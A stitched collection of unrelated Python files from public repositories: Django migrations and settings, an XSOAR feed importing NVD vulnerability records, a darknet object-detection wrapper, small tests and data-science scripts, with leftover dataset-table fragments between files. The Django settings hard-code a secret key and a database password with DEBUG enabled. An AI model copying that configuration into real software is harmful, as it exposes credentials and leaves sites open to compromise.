register_function("hamming", (dtype("str"),dtype("str"),), dtype("int32"))
register_function("end", (dtype("interval<?T>"),), dtype("?T"))
register_function("start", (dtype("interval<?T>"),), dtype("?T"))
register_function("inXNonPar", (dtype("?T:locus"),), dtype("bool"))
register_function("escapeString", (dtype("str"),), dtype("str"))
register_function("isHomRef", (dtype("call"),), dtype("bool"))
register_seeded_function("rand_norm", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("chi_squared_test", (dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{p_value: float64, odds_ratio: float64}"))
# ===== FILE: /amnesia/task/migrations/0002_auto_20170504_2027.py (pratulyab/amnesia, no license) =====
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-05-04 20:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('task', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='task',
name='every',
field=models.CharField(choices=[('15', '15 minutes'), ('30', '30 minutes'), ('45', '45 minutes'), ('0', '60 minutes')], default='0', help_text='Repeat every', max_length=2),
),
migrations.AlterField(
model_name='task',
name='sleep_cycle',
field=models.CharField(choices=[('4-19', '8pm - 4am'), ('5-20', '9pm - 5am'), ('6-21', '10pm - 6am'), ('7-22', '11pm - 7am'), ('8-23', '12pm - 8am')], default='4-19', help_text='Assuming 8 hours sleep cycle', max_length=5),
),
]
# ===== FILE: /Packs/NationalVulnerabilityDatabaseFeed/Integrations/NationalVulnerabilityDatabaseFeed/NationalVulnerabilityDatabaseFeed.py (demisto/content, MIT) =====
import demistomock as demisto
from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import
from CommonServerUserPython import * # noqa
from typing import Dict, Any, List
from datetime import datetime, timedelta
from time import sleep
import urllib3
# Disable insecure warnings
urllib3.disable_warnings() # pylint: disable=no-member
''' CONSTANTS '''
DATE_FORMAT = "%Y-%m-%dT%H:%M:%S:000 UTC-00:00" # ISO8601 format with UTC, default in XSOAR
DEFAULT_LIMIT = 100
# =========================================== Helper Functions ===========================================#
def parse_cve_data(item=None) -> dict:
fields = dict()
if item and isinstance(item, dict):
# Populate common fields
cve: dict = item.get('cve') # type: ignore
# Description
if "description" in cve:
description = cve.get('description', {}).get('description_data')
if "en" in [x.get('lang') for x in description]:
fields['cvedescription'] = description[([x.get('lang') for x in description]).index('en')].get('value')
# References
if "references" in cve:
references: List = cve.get('references', {}).get('reference_data')
fields['publications'] = [
{
"link": x.get('url'),
"title": x.get('name'),
"source": x.get('refsource')
} for x in references]
# Parse impact data
impact = item.get('impact')
if impact:
# All CVSS data
all_cvss = []
# Base Metric V2
if "impact" in impact:
impact_v2 = impact.get('impact')
if "baseMetricV2" in impact_v2:
base_metric_v2 = impact_v2.get('baseMetricV2')
if "cvssV2" in base_metric_v2:
cvss_v2 = base_metric_v2.get('cvssV2')
all_cvss.append({"cvssV2": cvss_v2})
# Base Metric V3
if "baseMetricV3" in impact:
base_metric = impact.get('baseMetricV3')
if "cvssV3" in base_metric:
cvss_v3 = base_metric.get('cvssV3')
all_cvss.append({"cvssV3": cvss_v3})
cvss_v3_data = []
for k, v in cvss_v3.items():
cvss_v3_data.append(
{
"metric": camel_case_to_underscore(k).replace("_", " ").title(),
"values": v
}
)
fields['cvss3'] = cvss_v3_data
fields['cvssvector'] = cvss_v3.get('vectorString')
fields['cvss'] = all_cvss
return fields
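# Illustrative shape of the dict parse_cve_data returns (the values below are
# made up for illustration, not taken from a real CVE):
# {
#     'cvedescription': 'Buffer overflow in ...',
#     'publications': [{'link': 'https://...', 'title': '...', 'source': 'MISC'}],
#     'cvss3': [{'metric': 'Base Score', 'values': 9.8}, ...],
#     'cvssvector': 'CVSS:3.1/AV:N/AC:L/...',
#     'cvss': [{'cvssV2': {...}}, {'cvssV3': {...}}]
# }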
def extract_titles(data_item={}) -> list:
titles = []
for title in data_item.get('titles'):
titles.append(title.get('title'))
return titles
def extract_descriptions(data_item={}) -> list:
descriptions = []
for description in data_item.get('cve', {}).get('description', {}).get('description_data'):
descriptions.append(description.get('value'))
return descriptions
# ========================================== Generic Query ===============================================#
def test_module(client: BaseClient, params: Dict[str, Any]):
api_key = params.get('apiKey')
try:
params = {
"cveId": "CVE-2020-22120"
}
if api_key:
params['apiKey'] = api_key
res = client._http_request('GET', full_url='https://services.nvd.nist.gov/rest/json/cpes/1.0', params=params)
if "error" in res:
return_error((res.get('error')))
elif "resultsPerPage" in res:
return_results('ok')
except Exception as err:
raise DemistoException(err)
def fetch_indicators_command(client, params):
command = demisto.command()
api_key = params.get('apiKey')
get_type = params.get('type')
cpe_match_string = params.get('cpeMatchString')
cpe_keyword = params.get('keyword')
include_deprecated = params.get('deprecated')
cvss_v2_metrics = params.get('cvssV2Metrics')
cvss_v2_severity = params.get('cvssV2Severity')
cvss_v3_metrics = params.get('cvssV3Metrics')
cvss_v3_severity = params.get('cvssV3Severity')
history = int(params.get('history'))
exceeds_span = True
urls = {
"CPE": "/rest/json/cpes/1.0/",
"CVE": "/rest/json/cves/1.0/"
}
url = urls[get_type]
now = datetime.utcnow()
startIndex = 0
resultsPerPage = 2000
data_items = []
indicators: List[Dict] = []
last_run_data = demisto.getLastRun()
run_times: List[datetime] = []
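    # NVD throttles unauthenticated clients much harder than keyed ones; the
    # limits used below (9 vs 99 calls per rolling minute) appear chosen to stay
    # just under the 10 (anonymous) / 100 (with API key) requests-per-minute caps.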
run_limit = 9
# If there is no last run date, use the history specified in the params
if "lastRun" not in last_run_data or command == 'nvd-get-indicators':
last_run = (now - timedelta(days=history))
else:
last_run = dateparser.parse(last_run_data.get('lastRun')) # type: ignore
modStartDate = last_run
modEndDate = now
# API calls can only span 120 days, so we should loop if the history
# parameter is greater than this
while exceeds_span and modEndDate and modStartDate:
delta = (modEndDate - modStartDate).days
if delta > 120:
modEndDate = modStartDate + timedelta(days=120)
else:
exceeds_span = False
params = {
"modStartDate": modStartDate.strftime(DATE_FORMAT),
"modEndDate": modEndDate.strftime(DATE_FORMAT),
"startIndex": startIndex,
"resultsPerPage": resultsPerPage
}
if api_key:
params['apiKey'] = api_key
run_limit = 99
if get_type == "CPE":
params['addOns'] = "cves"
if include_deprecated:
params['includeDeprecated'] = include_deprecated
if get_type == "CVE":
if cvss_v2_metrics:
params['cvssV2Metrics'] = cvss_v2_metrics
if cvss_v2_severity:
params['cvssV2Severity'] = cvss_v2_severity
if cvss_v3_metrics:
params['cvssV3Metrics'] = cvss_v3_metrics
if cvss_v3_severity:
params['cvssV3Severity'] = cvss_v3_severity
if cpe_match_string:
params['cpeMatchString'] = cpe_match_string
if cpe_keyword:
params['keyword'] = cpe_keyword
total_results = 1
collection_count = 0
# Collect all the indicators together
while collection_count < total_results:
# Check to ensure no rate limits are hit
if len(run_times) == run_limit:
first_time = run_times[0]
last_time = run_times[(run_limit - 1)]
if (last_time - first_time).seconds <= 60:
demisto.info("Rate limit hit, sleeping for 3 seconds")
# We sleep 3 seconds to avoid hitting any rate limits
sleep(3)
del run_times[0]
run_times.append(datetime.utcnow())
res = client._http_request('GET', url, params=params, timeout=300)
# Check to see if there are any errors
if "error" in res:
return_error(res.get('error'))
total_results = res.get('totalResults', 0)
resultsPerPage = res.get('resultsPerPage', 0)
result = res.get('result')
if result:
if get_type == 'CPE':
data_items += result.get('cpes')
else:
data_items += result.get('CVE_Items')
params['startIndex'] += resultsPerPage
collection_count += resultsPerPage
modStartDate = modEndDate
modEndDate = now
# If this is nvd-get-indicators command:
if command == 'nvd-get-indicators':
# If they are CPEs
if get_type == 'CPE':
outputs = [
{
"cpe23Uri": x.get('cpe23Uri'),
"titles": ". ".join(extract_titles(data_item=x)),
"vulnerabilities": ", ".join(x.get('vulnerabilities'))
} for x in data_items
]
command_results = CommandResults(
outputs_prefix='CPE',
outputs_key_field='cpe23Uri',
outputs=data_items,
readable_output=tableToMarkdown("National Vulnerability Database CPEs:", outputs)
)
# If they are CVEs
elif get_type == 'CVE':
outputs = [
{
"id": x.get('cve').get('CVE_data_meta').get('ID'),
"description": ". ".join(extract_descriptions(data_item=x))
}
for x in data_items]
command_results = CommandResults(
outputs_prefix='CVE',
outputs_key_field='id',
outputs=data_items,
readable_output=tableToMarkdown("National Vulnerability Database CVEs:", outputs)
)
return_results(command_results)
# Else if this is fetch-indicators
elif command == 'fetch-indicators':
indicators = []
# If they are CPEs
if get_type == 'CPE' and data_items:
for item in data_items:
item['type'] = "CPE"
indicator = {
"value": item.get('cpe23Uri'),
"rawJSON": item
}
# This is reserved for future use
if "vulnerabilities" in item:
relationships = []
for vulnerability in item.get('vulnerabilities', []):
relationship = EntityRelationship(
name=EntityRelationship.Relationships.RELATED_TO,
entity_a=item.get('cpe23Uri'),
entity_a_family="Indicator",
entity_a_type="CPE",
entity_b=vulnerability,
entity_b_family="Indicator",
entity_b_type="CVE"
)
relationships.append(relationship.to_indicator())
indicator['relationships'] = relationships
indicators.append(indicator)
# If they are CVEs
elif get_type == 'CVE' and data_items:
for item in data_items:
item['type'] = "CVE"
fields: Dict = parse_cve_data(item)
indicators.append({
"value": item.get('cve', {}).get('CVE_data_meta', {}).get('ID'),
"type": FeedIndicatorType.CVE,
"fields": fields,
"rawJSON": item
})
# Create the indicators in a batch, 2000 at a time
for b in batch(indicators, batch_size=2000):
demisto.createIndicators(b)
# Set new integration context
demisto.setLastRun({"lastRun": now.isoformat()})
# =========================================== Built-In Queries ===========================================#
''' MAIN FUNCTION '''
# COMMAND CONSTANTS
commands = {
'test-module': test_module,
'fetch-indicators': fetch_indicators_command,
'nvd-get-indicators': fetch_indicators_command
}
def main() -> None:
params = demisto.params()
base_url = "https://services.nvd.nist.gov"
verify_cert = not params.get('insecure', False)
proxy = params.get('proxy', False)
command = demisto.command()
demisto.debug(f'Command being called is {command}')
try:
client = BaseClient(
base_url=base_url,
verify=verify_cert,
proxy=proxy,
)
commands[command](client, params)
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute {command} command.\nError: {str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
# ===== FILE: /detect_object.py (AbhishekBose/yolo_docker, no license) =====
#%%
from ctypes import *
import random
import argparse
import os
import traceback
import cv2
import functools
import numpy as np
import time
import sys
import json
import imutils
#%%
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
libdarknet_path = os.path.join("/home/darknet/libdarknet.so")
lib = CDLL(libdarknet_path, RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE]
predict_image.restype = POINTER(c_float)
def classify(net, meta, im):
out = predict_image(net, im)
res = []
for i in range(meta.classes):
res.append((meta.names[i], out[i]))
res = sorted(res, key=lambda x: -x[1])
return res
def array_to_image(arr):
# need to return old values to avoid python freeing memory
arr = arr.transpose(2,0,1)
c, h, w = arr.shape[0:3]
arr = np.ascontiguousarray(arr.flat, dtype=np.float32) / 255.0
data = arr.ctypes.data_as(POINTER(c_float))
im = IMAGE(w,h,c,data)
return im, arr
def netdetect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
im, image = array_to_image(image)
rgbgr_image(im)
num = c_int(0)
pnum = pointer(num)
predict_image(net, im)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
if (nms): do_nms_obj(dets, num, meta.classes, nms);
res = []
for j in range(num):
a = dets[j].prob[0:meta.classes]
if any(a):
ai = np.array(a).nonzero()[0]
for i in ai:
b = dets[j].bbox
res.append((meta.names[i], dets[j].prob[i], (max(b.x,0), max(b.y,0), max(b.w,0), max(b.h,0))))
res = sorted(res, key=lambda x: -x[1])
if isinstance(image,bytes): free_image(im)
free_detections(dets, num)
return res
#%%
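# convert_yolo_normal: converts a YOLO-style centre box (x, y, w, h) into corner
# coordinates (left, right, top, bottom); s1/s2 are accepted but unused here,
# presumably reserved for rescaling to image dimensions.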
def convert_yolo_normal(x,y,w,h,s1,s2):
b0=(2*x-w)/2
b1=w+b0
b2=(2*y-h)/2
b3=h+b2
return (int(b0),int(b1),int(b2),int(b3))
#%%
if __name__ == "__main__":
    # Model paths (weights, network cfg and class metadata) come from config.json
    with open('config.json') as f:
        data = json.load(f)
    weights_file = data['weights_file']
    cfg_file = data['cfg_file']
    obj_data = data['obj_file']
    image_name = sys.argv[1]
    img = cv2.imread(image_name)
    netdet = load_net(cfg_file, weights_file, 0)
    metadet = load_meta(obj_data)
    obj_res = netdetect(netdet, metadet, img, 0.7)
    print('All detected objects are:: ')
    for i in range(len(obj_res)):
        print(obj_res[i][0])
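# A minimal follow-up sketch (assumption: obj_res entries are (label, confidence,
# (x, y, w, h)) tuples as returned by netdetect above); it is left commented out
# so the script's behaviour is unchanged:
#
#     for label, confidence, (x, y, w, h) in obj_res:
#         x1, x2, y1, y2 = convert_yolo_normal(x, y, w, h, img.shape[1], img.shape[0])
#         cv2.rectangle(img, (x1, y1), (x2, y2), (0, 255, 0), 2)
#     cv2.imwrite('detections.jpg', img)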
# ===== FILE: /portfolio/settings.py (Brian23-eng/portfolio-1, MIT) =====
"""
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
import django_heroku
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'y#k96$zi!2uc9@tj#bvr0smlxx1v)2dcff447#%=kwn)$4(*1i'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'portfolio.myportfolio',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'portfolio.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'portfolio',
'USER': 'moringa',
'PASSWORD': 'p@$$w0rd',
}
}
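# Note: django_heroku.settings(locals()) at the bottom of this file overrides
# DATABASES from Heroku's DATABASE_URL when deployed, so the credentials above
# effectively serve as local-development defaults.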
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# configuring the location for media
MEDIA_URL = '/project_images/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'project_images')
# Configure Django app for Heroku
django_heroku.settings(locals())
# ===== FILE: /spacy/tests/regression/test_issue3951.py (ashaffer/spaCy, MIT) =====
# coding: utf8
from __future__ import unicode_literals
import pytest
from spacy.matcher import Matcher
from spacy.tokens import Doc
@pytest.mark.xfail
def test_issue3951(en_vocab):
"""Test that combinations of optional rules are matched correctly."""
matcher = Matcher(en_vocab)
pattern = [
{"LOWER": "hello"},
{"LOWER": "this", "OP": "?"},
{"OP": "?"},
{"LOWER": "world"},
]
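    # "OP": "?" marks a token pattern as optional; the bare {"OP": "?"} is an
    # optional wildcard that can match any single token.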
matcher.add("TEST", None, pattern)
doc = Doc(en_vocab, words=["Hello", "my", "new", "world"])
matches = matcher(doc)
assert len(matches) == 0
# ===== FILE: /env/lib/python2.7/site-packages/observations/r/phosphate.py (silky/bell-ppls, no license) =====
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def phosphate(path):
"""Phosphate Level Data
Plasma inorganic phosphate levels from 33 subjects.
A data frame with 33 observations on the following 9 variables.
`group`
a factor with levels `control` and `obese`.
`t0`
baseline phosphate level.
`t0.5`
phosphate level after 1/2 an hour.
`t1`
phosphate level after one hour.
`t1.5`
phosphate level after 1 1/2 hours.
`t2`
phosphate level after two hours.
`t3`
phosphate level after three hours.
`t4`
phosphate level after four hours.
`t5`
phosphate level after five hours.
C. S. Davis (2002), *Statistical Methods for the Analysis of Repeated
Measurements*, Springer, New York.
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `phosphate.csv`.
Returns:
Tuple of np.ndarray `x_train` with 33 rows and 9 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'phosphate.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/HSAUR/phosphate.csv'
maybe_download_and_extract(path, url,
save_file_name='phosphate.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
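# A minimal usage sketch (the '~/data' path is an assumption; the CSV is
# downloaded there on first call):
#
#     x_train, metadata = phosphate('~/data')
#     x_train.shape        # (33, 9)
#     metadata['columns']  # group, t0, t0.5, ..., t5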
# ===== FILE: /src/main/python/wdbd/codepool/numpy/np_ployfit.py (shwdbd/python_codepool, no license) =====
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : np_ployfit.py
@Time : 2019/11/06 14:24:55
@Author : Jeffrey Wang
@Version : 1.0
@Contact : [email protected]
@Desc    :   Curve-fitting helpers
             1. fit_1z  first-order (linear) polynomial fit
             2. fit_2z  second-order (quadratic) polynomial fit
             ?  how to evaluate goodness of fit
'''
# here put the import lib
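# A minimal sketch of the two fits the docstring names: fit_1z / fit_2z are only
# listed above and not implemented in the original, and r_squared is just one
# common way to answer the "how to evaluate the fit" question, so all three
# definitions here are assumptions, not project API.
import numpy as np
def fit_1z(x, y):
    # First-order (linear) fit; np.polyfit returns coefficients highest power first.
    return tuple(np.polyfit(x, y, 1))
def fit_2z(x, y):
    # Second-order (quadratic) fit: coefficients (a, b, c) of a*x**2 + b*x + c.
    return tuple(np.polyfit(x, y, 2))
def r_squared(x, y, coeffs):
    # Coefficient of determination R**2 for a polynomial fit produced above.
    y_pred = np.polyval(coeffs, x)
    ss_res = np.sum((np.asarray(y) - y_pred) ** 2)
    ss_tot = np.sum((np.asarray(y) - np.mean(y)) ** 2)
    return 1.0 - ss_res / ss_tot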
# ===== FILE: /notebooks/data8_notebooks/lab04/tests/q2_3.py (y1ngyang/jupyterhub_AWS_deployment, MIT/BSD-3-Clause) =====
test = {
'name': '',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> disemvowel("Datascience rules!") == "Dtscnc rls!"
True
""",
'hidden': False,
'locked': False
},
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
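# okpy-style doctest case: the test passes iff the snippet under `code`, run as
# a doctest, prints True.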
# ===== FILE: /machinelearning/f16.py (wherby/hackerrank, no license) =====
import numpy as np
from math import sqrt
import matplotlib.pyplot as plt
import warnings
from matplotlib import style
from collections import Counter
style.use('fivethirtyeight')
dataset ={'k': [[1,2],[2,3],[3,1]], 'r': [[6,5], [7,7,],[8,6]]}
new_feature = [5,7]
# for i in dataset:
# for ii in dataset[i]:
# plt.scatter(ii[0],ii[1],s =100, color =i)
# [[plt.scatter(ii[0],ii[1],s =100, color =i) for ii in dataset[i]] for i in dataset]
# plt.scatter(new_feature[0], new_feature[1])
# plt.show()
def k_nearest_neighbors(data, predict, k =3):
if len(data) >=k:
warnings.warn('k is set to a value less than total voting groups')
distances = []
for group in data:
for features in data[group]:
#euclidean_distance = np.sqrt(np.sum((np.array(features) - np.array(predict)) **2))
euclidean_distance = np.linalg.norm(np.array(features) - np.array(predict))
distances.append([euclidean_distance, group])
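    # The k closest points vote; Counter.most_common(1) returns the majority
    # class among those k neighbours.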
votes = [ i[1] for i in sorted(distances)[:k]]
#print(sorted(distances))
#print( Counter(votes).most_common(1))
vote_result = Counter(votes).most_common(1)[0][0]
return vote_result
result = k_nearest_neighbors(dataset, new_feature , k =3)
print(result)
[[plt.scatter(ii[0],ii[1],s =100, color =i) for ii in dataset[i]] for i in dataset]
plt.scatter(new_feature[0], new_feature[1],color = result)
plt.show()
"[email protected]"
] | |
b20ca1afe34ac874e9dd05a205c75d038f6ea7b0 | 1ae03694e6826c2c3224647024f66debcebd62dc | /matlab/+robust_andrews_kernel/balance_scale/metrics.py | d78e052129030ea9de8d3552ad6679f6790d35df | [
"Apache-2.0"
] | permissive | Joaggi/Robust-kernels-for-robust-location-estimation | 5ad7f8f3be9a08e5d4283e03e017e5e3b9b186b8 | 9db62273de90547c982d819dc45e66ac86bfcb58 | refs/heads/master | 2023-04-17T22:41:01.652426 | 2022-08-02T23:43:31 | 2022-08-02T23:43:31 | 27,465,913 | 3 | 1 | null | 2022-08-02T23:39:44 | 2014-12-03T02:49:24 | MATLAB | UTF-8 | Python | false | false | 686 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 16 15:50:05 2014
@author: Alejandro
"""
import scipy.io as sio
import os, sys
lib_path = os.path.abspath('G:/Dropbox/Universidad/Machine Learning')
sys.path.append(lib_path)
import numpy as np
import Algorithms.Python.Metrics as Metrics
import Robustes.Experiments.metrics_over_labels as metrics_over_labels
dictionary = {
'Kernelconvexnmf':0,
'KernelKMeans':0,
'Kernelseminmfnnls':0,
'Kernelseminmfrule':0,
'KMeans':0,
'NNMF':0,
'RMNMF':1
}
labels_name = 'balance-scale-labels'
metrics_over_labels.metrics('G:/Dropbox/Universidad/Machine Learning/Robustes/BalanceScale/', dictionary, labels_name)
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.